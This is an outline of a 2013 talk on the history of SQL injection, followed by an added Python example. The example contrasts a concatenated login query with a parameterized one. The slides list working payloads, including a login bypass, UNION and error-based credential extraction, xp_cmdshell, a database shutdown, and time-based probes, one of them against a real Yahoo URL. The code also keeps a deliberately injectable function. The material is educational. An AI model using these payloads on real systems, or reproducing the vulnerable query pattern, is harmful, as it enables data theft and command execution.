
Codemotion 2013: Happy 15th anniversary, SQL Injection


Talk by Chema Alonso on the history and evolution of SQL Injection techniques, given at the Codemotion ES 2013 event held at the Escuela Universitaria de Informática of the Universidad Politécnica de Madrid.



  1. Happy 15th anniversary, SQL Injection
  2. Los Amantes del Círculo Polar
  3. 25 - Dec - 1998: The birth http://www.phrack.org/issues.html?id=8&issue=54
  4. ' or '1'='1
     admin ' or '1'='1
     q="Select uid from users where uid='"+$user+"' and pass='"+pass+"';"
     q="Select uid from users where uid='admin' and pass='' or '1'='1';"
  5. 14 - Aug - 2007: IBM http://www.docstoc.com/docs/39896830/IBM-Rational-ClearQuest-Web-Login-Bypass-SQL-Injection-Vulnerability
  6. Inband: -1' union select 1,1,1,1,username,1,'a',1 from users --
  7. 2001 - OutBand http://www.blackhat.com/presentations/bh-asia-01/litchfield/litchfield.doc
  8. Yesterday - [Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near the keyword 'or'.
     q="Select title from noticias where ud="+$id+";"
     Id=1 or 1=(select top 1 username from sysusers)
  9. Jul - 2007: Microsoft Partner Programme
  10. 2002 - Advanced SQL Injection Techniques https://sparrow.ece.cmu.edu/group/731-s11/readings/anley-sql-inj.pdf
  11. Advanced Tricks
      Username: '; begin declare @ret varchar(8000) set @ret=':' select @ret=@ret+' '+username+'/'+password from users where username>@ret select @ret as ret into foo end--
      Username: ' union select ret,1,1,1 from foo--
      Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value ': admin/r00tr0x! guest/guest chris/password fred/sesame' to a column of data type int.
      exec master..xp_cmdshell 'dir'
      Id= 1; shutdown --
  12. 27 - Mar - 2007
  13. Outer Bands: DNS Queries, FTP Sites, SMB Files, Remote DB, Web Files, Log Files
  14. 2002 - Blind
      http://server/miphp.php?id=1 and 1=1 -> True
      http://server/miphp.php?id=1 and 1=0 -> False
  15. 2010 - US Army
  16. 2010 - US Army
  17. 2002 - Time Based Blind SQL Injection http://www.northernfortress.net/more_advanced_sql_injection.pdf
  18. (more) Advanced Tricks
      ping -n 10 127.0.0.1
      if (ascii(substring(@s, @byte, 1)) & (power(2, @bit))) > 0 waitfor delay '0:0:5'
  19. 2004 - Time-Based in Other Databases
      SQL Server: 1) ; if ... waitfor delay  2) ; exec xp_cmdshell (ping -n)
      Oracle: 1) dbms_lock.sleep(), PL/SQL Injection
      MySQL: 1) and sleep(), 5.0 or higher  2) Benchmark functions
      Postgres: 1) pg_sleep()
  20. Jun - 2007: Solar Empire Exploit http://www.elladodelmal.com/2007/06/blind-sql-injection-ii-de-hackeando-un.html
  21. Apr - 2013: Yahoo! http://tw.ysm.emarketing.yahoo.com/soeasy/index.php?p=2&scId=113; select SLEEP(5)-- http://www.elladodelmal.com/2013/04/time-based-blind-sql-injection-en-yahoo.html
  22. 2007 - Time-Based SQL Injection using Heavy Queries https://www.defcon.org/images/defcon-16/dc16-presentations/alonso-parada/defcon-16-alonso-parada-wp.pdf
  23. Time-Based Using Heavy Queries in MS Access: True / False
  24. Deep Blind SQL Injection http://labs.portcullis.co.uk/application/deep-blind-sql-injection
  25. Serialized SQL Injection
  26. Arithmetic Blind SQL Injection
  27. RFD
  28. Connection String Parameter Pollution
  29. XPath Injection
  30. LDAP Injection
  31. OWASP TOP 10 - 2013
  32. Forbidden
  33. Fixing Code Injections isn't the worst job
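The concatenated login query from slide 4 beside the parameterized form that slide 33 points toward, as an added Python/sqlite3 example that is not code from the talk; the users table, its rows and the column names uid/pass are constructed here to match the query on the slide.

```python
import sqlite3

# Constructed sample data for this example; the users table and its two
# columns (uid, pass) follow the query shown on slide 4, the rows are made up.
SAMPLE_USERS = [("admin", "s3cret"), ("guest", "guest")]

# The password payload from slide 4.
TAUTOLOGY = "' or '1'='1"


def make_db():
    """In-memory SQLite database holding the constructed users table."""
    con = sqlite3.connect(":memory:")
    con.execute("create table users (uid text, pass text)")
    con.executemany("insert into users values (?, ?)", SAMPLE_USERS)
    return con


def login_vulnerable(con, user, pw):
    """String concatenation as on slide 4: user input becomes SQL text."""
    q = ("select uid from users where uid='" + user
         + "' and pass='" + pw + "';")
    return [row[0] for row in con.execute(q)]


def login_parameterized(con, user, pw):
    """Bound parameters: values travel separately from the statement, so a
    quote in the password stays data and cannot alter the WHERE clause."""
    q = "select uid from users where uid=? and pass=?"
    return [row[0] for row in con.execute(q, (user, pw))]


if __name__ == "__main__":
    con = make_db()
    # Concatenation: pass='' or '1'='1' matches every row, so "admin" logs in.
    print(login_vulnerable(con, "admin", TAUTOLOGY))
    # Parameters: the same payload is compared literally and matches nothing.
    print(login_parameterized(con, "admin", TAUTOLOGY))
    print(login_parameterized(con, "admin", "s3cret"))
```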
